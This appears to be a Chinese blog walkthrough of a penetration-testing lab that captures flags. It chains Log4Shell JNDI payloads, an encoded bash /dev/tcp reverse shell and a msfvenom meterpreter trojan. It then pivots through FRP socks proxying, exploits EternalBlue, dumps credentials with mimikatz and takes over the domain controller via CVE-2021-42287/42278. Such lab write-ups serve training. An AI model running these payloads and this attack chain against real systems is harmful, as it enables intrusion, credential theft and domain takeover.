vlambda博客
学习文章列表

log4j2靶场横向攻击

1.1 Ubuntu渗透

1.Ubuntu信息收集

1.端口扫描

nmap -v -Pn -T3 -sV -n -sT --open -p 22,1222,2222,22345,23,21,445,135,139,5985,2121,3389,13389,6379,4505,1433,3306,5000,5236,5900,5432,1521,1099,53,995,8140,993,465,878,7001,389,902,1194,1080,88,38080 192.168.1.6

发现存活端口为22和38080

2.WEB服务探测

http://192.168.1.6:38080/

log4j2靶场横向攻击

3.尝试使用log4j漏洞测试

POST /hello HTTP/1.1
Host: 192.168.1.6:38080
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
Content-Length: 41

payload=${jndi:ldap://XXXXX.ceye.io/exp}

log4j2靶场横向攻击

4.查看dnslog回显信息

log4j2靶场横向攻击

2.漏洞利用

1.在攻击机中开启恶意LDAP服务

java -jar JNDIExploit-1.2-SNAPSHOT.jar -i 192.168.1.7

log4j2靶场横向攻击

2.在攻击机中开启监听端口

nc -nlvp 5555

log4j2靶场横向攻击

3.正常反弹shell连接失败

POST /hello HTTP/1.1
Host: 192.168.1.6:38080
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
Content-Length: 82

payload=${jndi:ldap://192.168.1.7:1389/TomcatBypass/ReverseShell/192.168.1.7/5555}

log4j2靶场横向攻击

反弹shell后无法正常执行,会自动断开

log4j2靶场横向攻击

4.使用base64编码反弹shell

POST /hello HTTP/1.1
Host: 192.168.1.6:38080
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
Content-Length: 136

payload=${jndi:ldap://192.168.1.7:1389/TomcatBypass/Command/Base64/YmFzaCAtaSA%252BJiAvZGV2L3RjcC8xOTIuMTY4LjEuNy81NTU1IDA%252BJjE%253D}

反弹shell值为:bash -i >& /dev/tcp/192.168.1.7/5555 0>&1

需要先进行base64进行编码:YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjEuNy81NTU1IDA+JjE=

进行第一次URL编码:YmFzaCAtaSA%2BJiAvZGV2L3RjcC8xOTIuMTY4LjEuNy81NTU1IDA%2BJjE%3D

进行第二次URL编码:YmFzaCAtaSA%252BJiAvZGV2L3RjcC8xOTIuMTY4LjEuNy81NTU1IDA%252BJjE%253D

得到第二次URL编码值填入到参数中:${jndi:ldap://192.168.1.7:1389/TomcatBypass/Command/Base64/YmFzaCAtaSA%252BJiAvZGV2L3RjcC8xOTIuMTY4LjEuNy81NTU1IDA%252BJjE%253D}

log4j2靶场横向攻击

shell反弹成功,并可以进行正常交互

log4j2靶场横向攻击

5.查看环境为docker容器

cat /proc/1/cgroup

log4j2靶场横向攻击

6.在root目录中发现flag信息

log4j2靶场横向攻击

1.2 Windows7渗透

1.信息收集

1.使用账号密码登录主机

log4j2靶场横向攻击

2.查看主机信息

存在2张网卡

log4j2靶场横向攻击

3.使用MFS生成反弹木马

msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST=192.168.1.7 LPORT=4444 -f elf > shell.elf

log4j2靶场横向攻击

创建监听服务,并在靶机上运行木马

use exploit/multi/handler
set payload linux/x64/meterpreter/reverse_tcp 
set lhost 192.168.1.7
set lport 4444
exploit

查看木马已经上线

log4j2靶场横向攻击

4.自动添加路由

run post/multi/manage/autoroute

log4j2靶场横向攻击

5.ARP扫描探测

未发现存活主机

use auxiliary/scanner/discovery/arp_sweep
set rhosts 10.0.1.0/24
run

log4j2靶场横向攻击

6.使用ping扫描检测

for i in 10.0.1.{1..254}; do if ping -c 3 -w 3 $i &>/dev/null; then echo $i Find the target; fi; done

发现存活主机为10.0.1.7

log4j2靶场横向攻击

7.使用SMB进行扫描

use auxiliary/scanner/smb/smb_version
set rhosts 10.0.1.7
run

查看主机为Windows7,所在域为REDTEAM

log4j2靶场横向攻击

8.配置socks代理

https://github.com/fatedier/frp/releases

kali配置FRP服务器端

[common]
bind_port = 7000

启动frps服务

./frps -c frps.ini

log4j2靶场横向攻击

Ubuntu配置FRP客户端

[common]
server_addr = 192.168.1.7
server_port = 7000

[plugin_socks]
type = tcp
remote_port = 7777
plugin = socks5

启动frpc服务

./frpc -c frpc.ini

log4j2靶场横向攻击

9.MSF配置全局代理

setg proxies socks5:192.168.1.7:7777
set reverseallowproxy true

log4j2靶场横向攻击

2.漏洞利用

1.使用MS17-101攻击测试

use exploit/windows/smb/ms17_010_eternalblue
set payload windows/x64/meterpreter/bind_tcp
set rhost 10.0.1.7
run

使用MSF添加的路由,通过MS17-010无法利用主机,需要通过FRP进行SOCKS代理才能利用成功。

log4j2靶场横向攻击

2.导入mimikatz

load kiwi

log4j2靶场横向攻击

3.获取账号信息

creds_kerberos

获取到域账号和密码

log4j2靶场横向攻击

4.进入shell查看主机

shell
chcp 65001
net time /domain

当前域为:redteam.lab

log4j2靶场横向攻击

5.定位域控地址

ping -n 1 dc

log4j2靶场横向攻击

6.查看网卡

log4j2靶场横向攻击

1.3 域控渗透

1.域控信息收集

1.自动添加路由

run post/multi/manage/autoroute

log4j2靶场横向攻击

2.设置代理

use auxiliary/server/socks_proxy
set srvport 8888
run

log4j2靶场横向攻击

3.修改proxychains配置文件

socks5 	127.0.0.1 8888

log4j2靶场横向攻击

2.漏洞利用

1.使用CVE-2021-42287/CVE-2021-42278

git clone https://github.com/WazeHell/sam-the-admin.git

log4j2靶场横向攻击

2.使用代理攻击

proxychains python3 sam_the_admin.py "redteam/root:Red12345" -dc-ip 10.0.0.12 -shell

log4j2靶场横向攻击

3.查看主机信息

hostname
whoami

4.查看flag信息

type c:\users\administrator\desktop\flag.txt

参考连接:

https://mp.weixin.qq.com/s/zWyZlifnJdNCSfuYchXKlw


推荐阅读

[5.05] 暗喻幻想港中35周年限定版1.03+DLC+金手指+王中王存档 [5.05] 暗喻幻想港中35周年限定版1.03+DLC+金手指+王中王存档
零基础入门分布式系统 4. Broadcast protocols and logical time 零基础入门分布式系统 4. Broadcast protocols and logical time

相关文章